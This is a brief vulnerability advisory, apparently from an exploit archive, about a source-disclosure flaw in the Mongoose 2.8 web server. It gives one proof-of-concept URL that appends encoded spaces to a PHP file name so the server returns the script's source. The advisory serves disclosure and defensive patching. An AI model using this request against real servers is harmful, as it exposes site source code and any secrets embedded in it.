id: 10807
date: 02/09/2010
title: Mongoose version 2.8 source disclosure vulnerability
author: Pouya Daneshmand
cves: 

====================================================
Mongoose version 2.8 source disclosure vulnerability
====================================================

#################################################################
# Application Info:
# Name: mongoose
# Version: 2.8
# Download: http://code.google.com/p/mongoose/downloads/list
#################################################################
# Vulnerability Info:
# Type: Remote Source Disclosure
# Risk: Medium
#################################################################
# Vulnerability:
# http://127.0.0.1/file.php%20%20%20
#################################################################




#  0day.today [2023-03-22]  #